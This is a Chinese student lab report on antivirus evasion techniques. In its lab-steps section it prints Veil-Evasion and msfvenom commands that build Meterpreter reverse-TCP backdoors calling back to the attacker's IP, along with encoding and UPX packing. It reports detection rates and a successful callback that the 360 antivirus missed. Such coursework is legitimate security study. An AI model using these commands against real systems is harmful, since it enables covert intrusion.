Exp3 免杀原理与实践_4318王秀飞

Exp3 免杀原理与实践

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

  • -检测特征码:
    老师上课说过,每次网络传输或者其他过程,都会有包(tcp或者其他),这些包里的内容可被检测。如果其中有某一行代码含有特征码-即这段病毒程序的特定标志?我是这么理解的,就可以被查出来。这个是一个很精准的,但是存在滞后,因为病毒库要更新。
  • -基于行为检测:
    看这个程序或者代码是干什么的,如果是乱穿你的文件等等,那基本就是病毒。不过也不一定,有误差。
  • -启发式检测类似:
    这个感觉有点类似是自我学习然后发现病毒?我是这么理解的。

(2)免杀是做什么?

使恶意软件不被AV检测出来

(3)免杀的基本方法有哪些?

  • -改变特征码:

  • 依靠分片等方法尝试找出特征码区域,并对该区域代码进行编码。
  • 加壳,使其无法进行逆向,比对病毒库中的特征码。

  • 改变行为方式:

二、开始实验测试

1.原始版本

将上此实验产生的后门 wxf_backdoor.exe 文件直接拷贝到开启360的win主机下

1348968-20180407142122640-113052272.jpg

直接被360逮到~~

添加信任以后放在 http://www.virscan.org/上扫描

1348968-20180407142127378-765773986.jpg

48%的报毒率!!那些没查到的可能因为病毒太裸了吧~

接下来需要对其进行改装了

2.编码版本V1

先对后门木马编码1次,wxf-1.exe

1348968-20180407142339283-104407590.jpg
1348968-20180407142311550-66577018.jpg

48%的报毒率,没有任何变化????那就编码10次试试,wxf-10.exe

1348968-20180407142346739-1515722821.jpg
1348968-20180407142355523-373716750.jpg

48%的报毒率??完全没什么用!

3.veil-evasion版本

Veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装:sudo apt-get install veil-evasion(反正我没成功,用同学电脑做的)
在终端下输入指令veil-evasion即可打开软件,根据menu的提示依次键入以下指令:

use python/meterpreter/rev_tcp //设置payload
set LHOST 192.30.1.193 //设置反弹连接IP
set port 4318 //设置反弹端口4318
generate //生成
4318wxf //程序名
1

1348968-20180407152637762-1437450143.png

该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里,点击places的fengjia即可找到相应的文件夹:(但是被辣鸡360检测出来了)

1348968-20180407151623598-1358120882.jpg
1348968-20180407151347789-1155017411.jpg

放到网站上扫描一下:

1348968-20180407152120757-1336006042.jpg

4.C语言调用Shellcode版本

在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4318 -f c(第一次做失败了,ip是130,第二次ip是131。截图是第一次的,不影响最终结果)

1348968-20180407142416353-1316827928.jpg
1348968-20180407142456524-950729874.jpg

将shellcode字符串复制下来,然后在kaili中随便改一个文件的后缀为.c文件,打开修改这个文件为可运行。再将其转换成可执行文件.exe

1348968-20180407142510117-1957935664.jpg
1348968-20180407142516589-1164270579.jpg

将.c复制到windows中,编译运行,生成.exe文件。这时候kali用msf监听,并运行刚刚生成的.exe。成功回连。

1348968-20180407142527549-117865407.jpg
1348968-20180407142544268-279990067.jpg

找到exe可执行文件 wxf.exe,扫描一下

1348968-20180407142550201-839440364.jpg

17%的报毒率,比前面的方法不知道高到哪里去了!感动!

5.C调用升级版本

加壳
压缩壳UPX

直接用upx将MSF直接生成的文件加壳。

1348968-20180407142556937-1219309409.jpg
1348968-20180407142601290-529746375.jpg

报毒率反而上升了?这是什么情况!不太清楚!!

但是本次实验最恐怖的是!360没有扫描出来我的c语言调用Shellcode,加壳的也没???恐怖如斯!

1348968-20180407143713959-1253540918.jpg

三、离实战还缺些什么技术或步骤?

我们该如何把这个文件传给对方并持续保持运行。而且还不被发现,这是一个真正的实际问题。而且,仍然有被发现的可能,这说明并不是一个非常完美的病毒。

四、实验心得与体会

这次试验是开学到现在最恶心的实验,因为我装了一天半的veil都没有成功!最后只能用别人电脑做,这可真是,呵呵!还有这次实验让我知道了,原来我们入侵其他人的电脑是十分简单的,并不是我们想象的那么复杂,一个实际上课不到1周的人就可以做到这个地步,难以想象真正钻研的人,看我们的电脑,那简直,就是自己后花园!

转载于:https://www.cnblogs.com/20154318-wxf/p/8733210.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值